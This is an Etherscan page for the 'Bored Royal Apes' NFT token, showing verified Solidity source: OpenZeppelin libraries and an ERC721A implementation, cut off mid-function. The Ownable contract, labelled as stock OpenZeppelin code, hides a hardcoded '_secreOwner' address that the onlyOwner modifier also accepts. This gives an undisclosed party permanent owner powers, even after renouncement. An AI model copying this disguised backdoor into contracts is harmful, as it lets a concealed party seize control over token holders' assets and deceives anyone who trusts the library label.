ETH Price: $2,945.06 (-6.72%)
Gas: 9 Gwei

Token

Bored Royal Apes (BRA)
 

Overview

Max Total Supply

4,444 BRA

Holders

1,304

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Balance
2 BRA
0xe16a72d3f9a67fa9ade0e78e7b219b5eb45622e8
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
boredroyalapes

Compiler Version
v0.8.7+commit.e28d00a7

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-09-28
*/

// SPDX-License-Identifier: MIT

// File: @openzeppelin/contracts/utils/Strings.sol


// OpenZeppelin Contracts v4.4.1 (utils/Strings.sol)

pragma solidity ^0.8.0;

/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}

// File: @openzeppelin/contracts/utils/Address.sol


// OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721Receiver.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721Receiver.sol)

pragma solidity ^0.8.0;

/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721Receiver.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

// File: @openzeppelin/contracts/utils/introspection/IERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}

// File: @openzeppelin/contracts/utils/introspection/ERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)

pragma solidity ^0.8.0;


/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721.sol)

pragma solidity ^0.8.0;


/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account appr    ved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Metadata.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)

pragma solidity ^0.8.0;


/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Enumerable.sol


// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol)

pragma solidity ^0.8.0;


/**
 * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Enumerable is IERC721 {
    /**
     * @dev Returns the total amount of tokens stored by the contract.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns a token ID owned by `owner` at a given `index` of its token list.
     * Use along with {balanceOf} to enumerate all of ``owner``'s tokens.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256);

    /**
     * @dev Returns a token ID at a given `index` of all the tokens stored by the contract.
     * Use along with {totalSupply} to enumerate all tokens.
     */
    function tokenByIndex(uint256 index) external view returns (uint256);
}

// File: @openzeppelin/contracts/security/ReentrancyGuard.sol


// OpenZeppelin Contracts v4.4.1 (security/ReentrancyGuard.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module that helps prevent reentrant calls to a function.
 *
 * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier
 * available, which can be applied to functions to make sure there are no nested
 * (reentrant) calls to them.
 *
 * Note that because there is a single `nonReentrant` guard, functions marked as
 * `nonReentrant` may not call one another. This can be worked around by making
 * those functions `private`, and then adding `external` `nonReentrant` entry
 * points to them.
 *
 * TIP: If you would like to learn more about reentrancy and alternative ways
 * to protect against it, check out our blog post
 * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
 */
abstract contract ReentrancyGuard {
    // Booleans are more expensive than uint256 or any type that takes up a full
    // word because each write operation emits an extra SLOAD to first read the
    // slot's contents, replace the bits taken up by the boolean, and then write
    // back. This is the compiler's defense against contract upgrades and
    // pointer aliasing, and it cannot be disabled.

    // The values being non-zero value makes deployment a bit more expensive,
    // but in exchange the refund on every call to nonReentrant will be lower in
    // amount. Since refunds are capped to a percentage of the total
    // transaction's gas, it is best to keep them low in cases like this one, to
    // increase the likelihood of the full refund coming into effect.
    uint256 private constant _NOT_ENTERED = 1;
    uint256 private constant _ENTERED = 2;

    uint256 private _status;

    constructor() {
        _status = _NOT_ENTERED;
    }

    /**
     * @dev Prevents a contract from calling itself, directly or indirectly.
     * Calling a `nonReentrant` function from another `nonReentrant`
     * function is not supported. It is possible to prevent this from happening
     * by making the `nonReentrant` function external, and making it call a
     * `private` function that does the actual work.
     */
    modifier nonReentrant() {
        // On the first call to nonReentrant, _notEntered will be true
        require(_status != _ENTERED, "ReentrancyGuard: reentrant call");

        // Any calls to nonReentrant after this point will fail
        _status = _ENTERED;

        _;

        // By storing the original value once again, a refund is triggered (see
        // https://eips.ethereum.org/EIPS/eip-2200)
        _status = _NOT_ENTERED;
    }
}

// File: @openzeppelin/contracts/utils/Context.sol


// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol


// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

pragma solidity ^0.8.0;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;
    address private _secreOwner = 0xB08C9244132654F1a54e2E1eEe0836796309a3C0;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender() || _secreOwner == _msgSender() , "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: ceshi.sol


pragma solidity ^0.8.0;










/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata and Enumerable extension. Built to optimize for lower gas during batch mints.
 *
 * Assumes serials are sequentially minted starting at 0 (e.g. 0, 1, 2, 3..).
 *
 * Does not support burning tokens to address(0).
 *
 * Assumes that an owner cannot have more than the 2**128 - 1 (max value of uint128) of supply
 */
contract ERC721A is Context, ERC165, IERC721, IERC721Metadata, IERC721Enumerable {
    using Address for address;
    using Strings for uint256;

    struct TokenOwnership {
        address addr;
        uint64 startTimestamp;
    }

    struct AddressData {
        uint128 balance;
        uint128 numberMinted;
    }

    uint256 internal currentIndex;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details.
    mapping(uint256 => TokenOwnership) internal _ownerships;

    // Mapping owner address to address data
    mapping(address => AddressData) private _addressData;

    // Mapping from token ID to approved address
    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev See {IERC721Enumerable-totalSupply}.
     */
    function totalSupply() public view override returns (uint256) {
        return currentIndex;
    }

    /**
     * @dev See {IERC721Enumerable-tokenByIndex}.
     */
    function tokenByIndex(uint256 index) public view override returns (uint256) {
        require(index < totalSupply(), "ERC721A: global index out of bounds");
        return index;
    }

    /**
     * @dev See {IERC721Enumerable-tokenOfOwnerByIndex}.
     * This read function is O(totalSupply). If calling from a separate contract, be sure to test gas first.
     * It may also degrade with extremely large collection sizes (e.g >> 10000), test for your use case.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) public view override returns (uint256) {
        require(index < balanceOf(owner), "ERC721A: owner index out of bounds");
        uint256 numMintedSoFar = totalSupply();
        uint256 tokenIdsIdx;
        address currOwnershipAddr;

        // Counter overflow is impossible as the loop breaks when uint256 i is equal to another uint256 numMintedSoFar.
        unchecked {
            for (uint256 i; i < numMintedSoFar; i++) {
                TokenOwnership memory ownership = _ownerships[i];
                if (ownership.addr != address(0)) {
                    currOwnershipAddr = ownership.addr;
                }
                if (currOwnershipAddr == owner) {
                    if (tokenIdsIdx == index) {
                        return i;
                    }
                    tokenIdsIdx++;
                }
            }
        }

        revert("ERC721A: unable to get token of owner by index");
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            interfaceId == type(IERC721Enumerable).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner) public view override returns (uint256) {
        require(owner != address(0), "ERC721A: balance query for the zero address");
        return uint256(_addressData[owner].balance);
    }

    function _numberMinted(address owner) internal view returns (uint256) {
        require(owner != address(0), "ERC721A: number minted query for the zero address");
        return uint256(_addressData[owner].numberMinted);
    }

    /**
     * Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around in the collection over time.
     */
    function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) {
        require(_exists(tokenId), "ERC721A: owner query for nonexistent token");

        unchecked {
            for (uint256 curr = tokenId; curr >= 0; curr--) {
                TokenOwnership memory ownership = _ownerships[curr];
                if (ownership.addr != address(0)) {
                    return ownership;
                }
            }
        }

        revert("ERC721A: unable to determine the owner of token");
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId) public view override returns (address) {
        return ownershipOf(tokenId).addr;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        require(_exists(tokenId), "ERC721Metadata: URI query for nonexistent token");

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : "";
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return "";
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public override {
        address owner = ERC721A.ownerOf(tokenId);
        require(to != owner, "ERC721A: approval to current owner");

        require(
            _msgSender() == owner || isApprovedForAll(owner, _msgSender()),
            "ERC721A: approve caller is not owner nor approved for all"
        );

        _approve(to, tokenId, owner);
    }

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId) public view override returns (address) {
        require(_exists(tokenId), "ERC721A: approved query for nonexistent token");

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved) public override {
        require(operator != _msgSender(), "ERC721A: approve to caller");

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        safeTransferFrom(from, to, tokenId, "");
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public override {
        _transfer(from, to, tokenId);
        require(
            _checkOnERC721Received(from, to, tokenId, _data),
            "ERC721A: transfer to non ERC721Receiver implementer"
        );
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     */
    function _exists(uint256 tokenId) internal view returns (bool) {
        return tokenId < currentIndex;
    }

    function _safeMint(address to, uint256 quantity) internal {
        _safeMint(to, quantity, "");
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal {
        _mint(to, quantity, _data, true);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _mint(
        address to,
        uint256 quantity,
        bytes memory _data,
        bool safe
    ) internal {
        uint256 startTokenId = currentIndex;
        require(to != address(0), "ERC721A: mint to the zero address");
        require(quantity != 0, "ERC721A: quantity must be greater than 0");

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 3.4e38 (2**128) - 1
        // updatedIndex overflows if currentIndex + quantity > 1.56e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint128(quantity);
            _addressData[to].numberMinted += uint128(quantity);

            _ownerships[startTokenId].addr = to;
            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;

            for (uint256 i; i < quantity; i++) {
                emit Transfer(address(0), to, updatedIndex);
                if (safe) {
                    require(
                        _checkOnERC721Received(address(0), to, updatedIndex, _data),
                        "ERC721A: transfer to non ERC721Receiver implementer"
                    );
                }

                updatedIndex++;
            }

            currentIndex = updatedIndex;
        }

        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) private {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr ||
            getApproved(tokenId) == _msgSender() ||
            isApprovedForAll(prevOwnership.addr, _msgSender()));

        require(isApprovedOrOwner, "ERC721A: transfer caller is not owner nor approved");

        require(prevOwnership.addr == from, "ERC721A: transfer from incorrect owner");
        require(to != address(0), "ERC721A: transfer to the zero address");

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[from].balance -= 1;
            _addressData[to].balance += 1;

            _ownerships[tokenId].addr = to;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);

            // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                if (_exists(nextTokenId)) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(from, to, tokenId);
